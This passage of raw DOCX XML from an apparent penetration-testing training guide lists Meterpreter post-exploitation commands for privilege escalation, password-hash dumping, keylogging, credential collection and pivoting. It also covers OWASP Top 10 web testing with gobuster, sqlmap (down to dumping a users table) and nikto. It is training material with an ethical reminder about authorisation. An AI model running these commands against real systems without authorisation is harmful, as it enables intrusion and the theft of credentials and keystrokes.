      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Review and run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">check                      # Check if target is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit                    # Or 'run'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Basic navigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sysinfo                    # System information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getuid                     # Current user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd                        # Current directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ls                         # List files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shell                      # Drop to system shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem                  # Attempt automatic privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run post/multi/recon/local_exploit_suggester  # Find local escalation paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Post-exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hashdump                   # Dump password hashes (requires SYSTEM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshot                 # Take a screenshot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">keyscan_start              # Start keylogger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">keyscan_dump               # Dump captured keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run post/windows/gather/credentials/credential_collector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run post/multi/manage/autoroute  # Add route through compromised host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd add -l 3389 -r 10.0.0.1 -p 3389  # Port forward RDP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E65100" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ETHICAL REMINDER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Every Meterpreter session in a professional pentest must be documented with timestamps, IP addresses, and purpose. Your evidence must be reproducible and clearly tied to authorized test objectives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7.6 Web Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Web applications are among the most common attack surfaces. They're accessible from anywhere and often have vulnerabilities from poor coding practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 (Must Know):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2400"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="4420"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>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44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A01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Broken Access Control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Burp Suite, manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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IDOR, privilege escalation via URL manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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A02</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Cryptographic Failures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Burp Suite, sslscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="44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HTTP instead of HTTPS, weak cipher suites</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A03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Injection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SQLMap, Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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SQL injection, XSS, command injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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A04</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Insecure Design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Manual analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="44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Business logic flaws, missing security controls</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A05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Security Misconfiguration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Nikto, Gobuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Default credentials, exposed admin panels</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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A06</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Vulnerable Components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Nuclei, retire.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="44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Outdated jQuery, Apache with known CVEs</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A07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 Failures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Hydra, Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Brute force, session fixation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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A08</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Integrity Failures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Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="44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Insecure deserialization, CI/CD pipeline attacks</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A09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Logging Failures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Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Missing logs making post-incident analysis impossible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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A10</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SSRF</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Burp Suite, manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="44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Server-side requests to internal resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Essential Web Testing Tools:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Directory and file bruteforcing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">feroxbuster -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/big.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># SQL injection testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u 'http://target.com/page?id=1' --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u 'http://target.com/page?id=1' -D dbname --tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u 'http://target.com/page?id=1' -D dbname -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Web scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nikto -h http://target.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
